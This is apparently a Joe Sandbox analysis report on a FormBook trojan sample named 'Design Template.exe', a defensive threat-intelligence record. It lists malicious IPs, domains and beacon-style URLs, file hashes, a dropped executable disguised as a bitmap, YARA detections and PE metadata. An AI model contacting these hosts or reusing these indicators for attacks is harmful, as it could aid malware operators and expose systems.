                                                                              • URL Reputation: safe
                                                                              unknown

                                                                              Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              198.50.252.64
                                                                              www.landreclaim.comCanada
                                                                              16276OVHFRtrue
                                                                              160.153.136.3
                                                                              rememberingedward.infoUnited States
                                                                              21501GODADDY-AMSDEtrue
                                                                              34.102.136.180
                                                                              bestflowersandgifts.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              156.226.160.56
                                                                              www.2elden.comSeychelles
                                                                              136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                              47.105.113.141
                                                                              www.zq2003.comChina
                                                                              37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                              14.215.190.65
                                                                              gz01.bch.baidu-itm.comChina
                                                                              58466CT-GUANGZHOU-IDCCHINANETGuangdongprovincenetworkCNtrue

                                                                              General Information

                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                              Analysis ID:385453
                                                                              Start date:12.04.2021
                                                                              Start time:14:40:34
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 9m 27s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:light
                                                                              Sample file name:Design Template.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:32
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:1
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.bank.troj.evad.winEXE@7/1@15/6
                                                                              EGA Information:Failed
                                                                              HDC Information:
                                                                              • Successful, ratio: 62.8% (good quality ratio 54.5%)
                                                                              • Quality average: 71.8%
                                                                              • Quality standard deviation: 33.5%
                                                                              HCA Information:
                                                                              • Successful, ratio: 77%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              Cookbook Comments:
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Found application associated with file extension: .exe
                                                                              Warnings:
                                                                              Show All
                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.50.102.62, 52.147.198.201, 184.30.24.56, 92.122.145.220, 104.43.193.48, 2.20.142.210, 2.20.142.209, 20.82.210.154, 52.255.188.83, 92.122.213.247, 92.122.213.194, 20.54.26.129, 52.155.217.156, 13.88.21.125, 104.42.151.234
                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www.buscar-id-apple.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              No simulations

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              198.50.252.64Shipping Doc.exeGet hashmaliciousBrowse
                                                                              • www.bintangcorp.com/sqe3/?r6=82DAHq2wg3tuo2XqCLLZJ41l7RS7yClHFVO3uI9CUY5+zT+6pv+aC+43mynQrH4pKWI8iWHnVQ==&rZvLVf=YL0hPBuh3Bh8NfMP
                                                                              TEC20201601.exeGet hashmaliciousBrowse
                                                                              • www.melbournemedicalhealth.net/m8ec/?VPXh=GdPH&MvZ0HjY=ilbnhHVsbLcSqSBJLKZotjdD4qCqiNhav+gd5mGUy/YGPx1v2HXvdJB9yyxpl/8QwS96
                                                                              PI DX190530.exeGet hashmaliciousBrowse
                                                                              • www.artemisplastic.com/g2t/?Hp=Y4KDuNph&YP=t66oSzNKtGU0CMBolCrZoHIrgB5Pfu02DUYCDcIwLLM2jCY8ClAW1PeZ3EO9e0zCGeJn
                                                                              160.153.136.3sgJRcWvnkP.exeGet hashmaliciousBrowse
                                                                              • www.angelique-yoga.com/svh9/?EZA4iv=3+1keiJQeiCfSFf0lryhDdo9oQ7ZhWftUl7g93orCRsqpmVaeyk3iGEIaA5mjzn0PnfUEO9yMg==&GzuLH=VBZtT83HH6GhB4
                                                                              jEXf5uQ3DE.exeGet hashmaliciousBrowse
                                                                              • www.redfiendpub.com/a6ru/?vRiX0=SOUS22xX9sTup/qaoB5MIRVPJCAYfdfKxkVl7wOCwv/faooOqTtneRL78hEWE1sF48OexjQHLg==&OhNl7=9rXdXRPXHBu
                                                                              Sales Invoice NO CN 6739.exeGet hashmaliciousBrowse
                                                                              • www.motherhenscoop.com/chue/?EzutZl=3fX08rZHUH-&EhA8R=FB66DOuroI4CmOxq6a67IaKWBfukXdwRgdwsxf3jwhQX0Agp8EFRmiJ/Ub3Lswqn57xy
                                                                              PO-RFQ # 097663899.exeGet hashmaliciousBrowse
                                                                              • www.bigbuddyco.com/uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut
                                                                              LWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                                              • www.karizcustomizeme.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy
                                                                              PO#41000055885.exeGet hashmaliciousBrowse
                                                                              • www.fastreliablemovers.com/s2oc/?8pDp00Hp=uy54us4ylpnOfyY6whDYihgyZC0Esknxq0Vw7fJMOJ1uVM8FmT+LYp8/ndiOcopYLTgN&GzrL=WBjT_rUpa
                                                                              Quotation.zip.exeGet hashmaliciousBrowse
                                                                              • www.customkreation.com/md5/?sZODfJ=SSaZr77bX+wOOkDQuPSRIEdkxTkeMUTiYzthw7Z1sXt2p1dwJW8/E+4NRWcqo2nKYqvGVVcT4Q==&IzrxUP=XFQdnvQx-jxL
                                                                              PaymentInvoice.exeGet hashmaliciousBrowse
                                                                              • www.thetrentproject.com/c22b/?9rgH70GX=3hZc8uDQNF2XjKqAM81yXveUJ3HYXQDb4GKg5u/1+rchdnCquZS07L8bvaz6arZeztnq&LL0=X4XDHNl0z
                                                                              ORIGINAL SHIPPING DOCUMENTSPDF.exeGet hashmaliciousBrowse
                                                                              • www.craftgrowfarms.com/qqeq/?D8IxB=7nSpJtUpafTlT6&eb=/IDxx24Axl4cbD5+EJQNaXvnYIhuFpcrqBwxsI56nktuMkyspMBINcRo1NfHRhPmyuWswdOuHA==
                                                                              PaymentInvoice.exeGet hashmaliciousBrowse
                                                                              • www.thetrentproject.com/c22b/?k6A0=3hZc8uDQNF2XjKqAM81yXveUJ3HYXQDb4GKg5u/1+rchdnCquZS07L8bvZfqGaFl0YO7P8W0gg==&Jhk=xN90gjnxaL
                                                                              Inquiry.docxGet hashmaliciousBrowse
                                                                              • www.warriormovers.com/qjnt/?s89=ZloBTponoX02e5gi3FYIj/PbKl44EdMQG0QlJcdkzx7vf5IbO8FhxdmCpjSPDQLZlRTi4A==&EL3=YXgtZbMH9Rj4xv
                                                                              Quotation.zip.exeGet hashmaliciousBrowse
                                                                              • www.customkreation.com/md5/?8pgpa6=SSaZr77bX+wOOkDQuPSRIEdkxTkeMUTiYzthw7Z1sXt2p1dwJW8/E+4NRVwDr2byRJaQ&ATR8IR=eT8xexNprnm8u4U
                                                                              Paymonth invoice.exeGet hashmaliciousBrowse
                                                                              • www.thirtytwohockey.com/tocg/?tZU0=d7p5RRREXQmDvUtPiIE4OQw74/HHtYHGT70rEjBzkCsmmafMBTybf7Sha+o3Gl2gVsKZGoTuww==&Upqh=GTdPsn7Pe8SXkPQ
                                                                              PO_RFQ007899_PDF.exeGet hashmaliciousBrowse
                                                                              • www.midnight-tribe.com/zgg6/?N2=u1vejHrzkkLu5b9V7XB400V330Lc8uew1eeDf/KdhWioLwkIxbYF1D95wcluNAi8eFtW&i4=Ppcd
                                                                              Swift001_jpg.exeGet hashmaliciousBrowse
                                                                              • www.newhopepropertysolutions.net/o9st/?KtClV=EA73qnsRXV8UgRhgNdmHym3gCvqtNllDE4wN3e9I7i7SCCwYnWBC3XhiPIw2HUhj6xVd&t8rL=FrghEXS
                                                                              SWIFT001_jpg.exeGet hashmaliciousBrowse
                                                                              • www.strategyplace.net/c8bs/?GR-8=Y+kvwDHuPs7d2r/xKL7WgaF8PTUWzGtrumOK1HlhuDcsPQWFrXK3haHxa/T6IUnTGo5pqWk2VA==&DZX45L=zZEdNNm87dpx
                                                                              COAU7229898130.xlsxGet hashmaliciousBrowse
                                                                              • www.treasureislandhunt.com/jzvu/?oP0tUN_=NzgAMwieRov+nxxgtDwKqk7zMisDg84XFY9auB03daZMDlDJBtB3rw2hqcc+lbtXE5ZF0w==&cf=4h-hmDNHNl6hA4
                                                                              BIOTECHPO960488580.exeGet hashmaliciousBrowse
                                                                              • www.davidkellywvhouse6.com/mb7q/?KneXF=OfKUnzPetndZQa7DVTEEDENIE4WmkhK+wSkJS9mdqBclGOhIlD09Pr9FnBmdL38oD9am&pPB=K2MDkxRXyRbTZrrp
                                                                              Product list.xlsxGet hashmaliciousBrowse
                                                                              • www.jedinomad.net/vu9b/?-ZltiVX8=ZVXBbfE+XbBh+xPAjEgNF7xgaCIHrLxMQl0hA28H7lZcPnDTQwmNEoEjTBG5DlxBNzP22A==&RfR4I=JR-06F20O6g
                                                                              OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                              • www.urfa-3.com/smzu/?D8cH=9r8tQzN8o24l6vY&sXUlfNy=2U89zO+VsmCZrKU9N+kvNT/Ei3oyx6cSiogMuCj+NMq1RoKapv70MYEUrKuaMhd7MLO+

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              gz01.bch.baidu-itm.comRequirement of Sonic Tube 50 mm.exeGet hashmaliciousBrowse
                                                                              • 14.215.190.65
                                                                              sample catalog_copy.exeGet hashmaliciousBrowse
                                                                              • 14.215.190.65
                                                                              dGWioTejLEz0eVM.exeGet hashmaliciousBrowse
                                                                              • 14.215.190.65
                                                                              1bTpgGVn5mfDSUq.exeGet hashmaliciousBrowse
                                                                              • 14.215.190.65
                                                                              9tyZf93qRdNHfVw.exeGet hashmaliciousBrowse
                                                                              • 14.215.190.65
                                                                              Confirm!!.exeGet hashmaliciousBrowse
                                                                              • 14.215.190.65
                                                                              Confirm.exeGet hashmaliciousBrowse
                                                                              • 14.215.190.65
                                                                              http://ncxps.com/wp-includes/rRRv7ILGM2dzPohaKlKheWb8rkju15bMqeEWcCglAp/Get hashmaliciousBrowse
                                                                              • 150.138.249.207
                                                                              order.exe.exeGet hashmaliciousBrowse
                                                                              • 150.138.249.207
                                                                              https://j.mp/2xHfFPyGet hashmaliciousBrowse
                                                                              • 150.138.249.207
                                                                              https://clck.ru/MsKX5Get hashmaliciousBrowse
                                                                              • 150.138.249.207
                                                                              http://tiny.cc/y77jmzGet hashmaliciousBrowse
                                                                              • 150.138.249.207
                                                                              http://tiny.cc/19i2lzGet hashmaliciousBrowse
                                                                              • 150.138.249.207
                                                                              http://www.liaoweiling.top/wp-includes/Documentation/deasjcj1-790300-5683-nyu2lidkpk-4wzto/Get hashmaliciousBrowse
                                                                              • 150.138.249.209
                                                                              15Ottawa Officework - PO # OTT10590 ( Cape # 20180007) .pdf.exeGet hashmaliciousBrowse
                                                                              • 150.138.249.206

                                                                              ASN

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              XIAOZHIYUN1-AS-APICIDCNETWORKUSRef. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                              • 164.155.20.27
                                                                              Betaling_advies.exeGet hashmaliciousBrowse
                                                                              • 156.241.53.253
                                                                              pumYguna1i.exeGet hashmaliciousBrowse
                                                                              • 156.241.53.161
                                                                              gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                              • 156.255.140.216
                                                                              eQLPRPErea.exeGet hashmaliciousBrowse
                                                                              • 156.254.221.72
                                                                              PO#41000055885.exeGet hashmaliciousBrowse
                                                                              • 156.241.53.51
                                                                              Quotation.zip.exeGet hashmaliciousBrowse
                                                                              • 103.48.133.161
                                                                              PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                              • 156.241.53.167
                                                                              RFQ11_ZIM2021pdf.exeGet hashmaliciousBrowse
                                                                              • 156.253.112.252
                                                                              PO2103019BGT.exeGet hashmaliciousBrowse
                                                                              • 156.241.53.167
                                                                              OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                              • 164.155.20.209
                                                                              New Month.exeGet hashmaliciousBrowse
                                                                              • 156.254.178.16
                                                                              proforma.exeGet hashmaliciousBrowse
                                                                              • 156.225.32.63
                                                                              bank details.exeGet hashmaliciousBrowse
                                                                              • 164.155.20.27
                                                                              BL Draft copy.exeGet hashmaliciousBrowse
                                                                              • 154.207.58.215
                                                                              JRTpdf.exeGet hashmaliciousBrowse
                                                                              • 156.253.112.252
                                                                              invoice bank.xlsxGet hashmaliciousBrowse
                                                                              • 156.254.221.72
                                                                              Factura proforma, pedido nuevo.exeGet hashmaliciousBrowse
                                                                              • 154.222.72.30
                                                                              Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                                              • 156.241.53.161
                                                                              Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                              • 156.241.53.161
                                                                              GODADDY-AMSDEsgJRcWvnkP.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              winlog.exeGet hashmaliciousBrowse
                                                                              • 160.153.137.170
                                                                              jEXf5uQ3DE.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              CNTR-NO-GLDU7267089.xlsxGet hashmaliciousBrowse
                                                                              • 160.153.129.38
                                                                              Sales Invoice NO CN 6739.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              PO-RFQ # 097663899.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              LWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                              • 160.153.137.40
                                                                              PO#41000055885.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              Quotation.zip.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              Remittance Advice-Advance Payment.exeGet hashmaliciousBrowse
                                                                              • 160.153.143.222
                                                                              RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                              • 160.153.137.170
                                                                              PaymentInvoice.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              ORIGINAL SHIPPING DOCUMENTSPDF.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              PaymentInvoice.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              Inquiry.docxGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              Quotation.zip.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              Paymonth invoice.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              PO_RFQ007899_PDF.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                              • 160.153.137.170
                                                                              OVHFRVJNPltkyHyI3CCo.exeGet hashmaliciousBrowse
                                                                              • 66.70.204.222
                                                                              SecuriteInfo.com.Trojan.MinerNET.8.21400.exeGet hashmaliciousBrowse
                                                                              • 51.255.34.118
                                                                              Anmodning om tilbud 12-04-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                              • 167.114.6.31
                                                                              Swift copy.pdf.exeGet hashmaliciousBrowse
                                                                              • 51.222.80.112
                                                                              PO-4147074_pdf.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              kQVi54bTM0.exeGet hashmaliciousBrowse
                                                                              • 5.196.102.93
                                                                              cym4u.exeGet hashmaliciousBrowse
                                                                              • 188.165.17.91
                                                                              Statement-ID-(400603).vbsGet hashmaliciousBrowse
                                                                              • 51.89.204.5
                                                                              $108,459.00.htmlGet hashmaliciousBrowse
                                                                              • 146.59.152.166
                                                                              LtfVNumoON.exeGet hashmaliciousBrowse
                                                                              • 144.217.30.204
                                                                              giATspz5dw.exeGet hashmaliciousBrowse
                                                                              • 142.4.204.181
                                                                              SecuriteInfo.com.__vbaHresultCheckObj.21994.exeGet hashmaliciousBrowse
                                                                              • 149.202.83.171
                                                                              SecuriteInfo.com.Variant.Johnnie.321295.17359.exeGet hashmaliciousBrowse
                                                                              • 91.121.140.167
                                                                              fileshare.docGet hashmaliciousBrowse
                                                                              • 188.165.245.148
                                                                              SecuriteInfo.com.Variant.Bulz.421173.18141.exeGet hashmaliciousBrowse
                                                                              • 51.89.77.2
                                                                              R1210322PIR-2FQUOTATION(P21C00285).exeGet hashmaliciousBrowse
                                                                              • 51.38.214.75
                                                                              Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf_1.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              Purchase Order No.10056.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\Liebert.bmp
                                                                              Process:C:\Users\user\Desktop\Design Template.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):164864
                                                                              Entropy (8bit):7.209205710925533
                                                                              Encrypted:false
                                                                              SSDEEP:3072:CB/2vWJU7SV/DPHojgdtuxB5ukO99VUY7ls0RmunNWOne:qCqfojIg751O99VUenIunEO
                                                                              MD5:5CE9A1DC2873C419D9F42B71EB3B15EA
                                                                              SHA1:C6FE65A2BCD683AD3B07458F382BFD14A24B4E8F
                                                                              SHA-256:FEE88005A72B0DEC13B45092E47B5275498E26BECA1FAE2193AB89E48E689C09
                                                                              SHA-512:68FE533EBB15DB0B4AF7F27733D77652825C0D68E5567536D307C47002514C821DE0D13E3774EB3CEB70E24CC02E747926919C90F6A56A2357761174A84D558B
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Author: JPCERT/CC Incident Response Group
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:low
                                                                              Preview: MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$.......}f?.9.QH9.QH9.QH"..Hu.QH"..H:.QH"..H8.QHRich9.QH........PE..L....."<.................r........................@.......................................@..........................................................................................................................................................text...Pp.......r.................. ..`................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.277372055729393
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Design Template.exe
                                                                              File size:479232
                                                                              MD5:56d56566623a2bc942141b56f9dd3da5
                                                                              SHA1:bc76bd9c064a7df36b84d5e08f266c8d4d9819ee
                                                                              SHA256:5397f0168be76c7e5efee936d341eb359b9015af5e77631129dc0664105e9259
                                                                              SHA512:85f335645b6e92ce0a4cf6c799e03a79f3ca60d19e3cca0dfcb808b08ec7b3e0c0c4f1538097f5ffea270053fb4bc38505d8c127dff3edde05c5181b33691dbf
                                                                              SSDEEP:12288:2Onh/74J2eipNdrLCjD6HBTLaQqP+BfWbMto:2Os2eipNdrLCjDzQfWE
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>M.._#.._#.._#.._#.._#./@).._#.DC-.._#.._".K^#..@0.._#./@(.._#..Y%.._#.Rich._#.........................PE..L.....FX...........

                                                                              File Icon

                                                                              Icon Hash:00828e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x422c4f
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                              DLL Characteristics:
                                                                              Time Stamp:0x5846A1E0 [Tue Dec 6 11:32:48 2016 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:896af7d86e4ad5191fa88fd4589e505c

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push FFFFFFFFh
                                                                              push 00441190h
                                                                              push 00424AD4h
                                                                              mov eax, dword ptr fs:[00000000h]
                                                                              push eax
                                                                              mov dword ptr fs:[00000000h], esp
                                                                              sub esp, 58h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [ebp-18h], esp
                                                                              call dword ptr [004331B8h]
                                                                              xor edx, edx
                                                                              mov dl, ah
                                                                              mov dword ptr [0044DF54h], edx
                                                                              mov ecx, eax
                                                                              and ecx, 000000FFh
                                                                              mov dword ptr [0044DF50h], ecx
                                                                              shl ecx, 08h
                                                                              add ecx, edx
                                                                              mov dword ptr [0044DF4Ch], ecx
                                                                              shr eax, 10h
                                                                              mov dword ptr [0044DF48h], eax
                                                                              push 00000001h
                                                                              call 00007F2138E4EA95h
                                                                              pop ecx
                                                                              test eax, eax
                                                                              jne 00007F2138E4CCBAh
                                                                              push 0000001Ch
                                                                              call 00007F2138E4CD78h
                                                                              pop ecx
                                                                              call 00007F2138E4E002h
                                                                              test eax, eax
                                                                              jne 00007F2138E4CCBAh
                                                                              push 00000010h
                                                                              call 00007F2138E4CD67h
                                                                              pop ecx
                                                                              xor esi, esi
                                                                              mov dword ptr [ebp-04h], esi
                                                                              call 00007F2138E4E8B1h
                                                                              call dword ptr [004330A8h]
                                                                              mov dword ptr [0044E65Ch], eax
                                                                              call 00007F2138E4E76Fh
                                                                              mov dword ptr [0044DF38h], eax
                                                                              call 00007F2138E4E518h
                                                                              call 00007F2138E4E45Ah
                                                                              call 00007F2138E4D057h
                                                                              mov dword ptr [ebp-30h], esi
                                                                              lea eax, dword ptr [ebp-5Ch]
                                                                              push eax
                                                                              call dword ptr [004330A4h]
                                                                              call 00007F2138E4E3EBh
                                                                              mov dword ptr [ebp-64h], eax
                                                                              test byte ptr [ebp-30h], 00000001h
                                                                              je 00007F2138E4CCB8h
                                                                              movzx eax, word ptr [ebp+00h]

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS98 (6.0) build 8168
                                                                              • [RES] VS98 (6.0) cvtres build 1720
                                                                              • [C++] VS98 (6.0) build 8168

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x42f480xb4.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x5104d0x1c.cdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x330000x41c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x320000x32000False0.535717773438data6.07259634526IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x330000x120000x12000False0.622328016493data6.95346677981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x450000xa1880x7000False0.887590680804data7.61616666061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .cdata0x500000x284290x29000False0.933629477896data7.95563959987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                              Imports

                                                                              DLLImport
                                                                              OPENGL32.dllglCopyPixels, glFlush, glDisableClientState, glCullFace, glClear
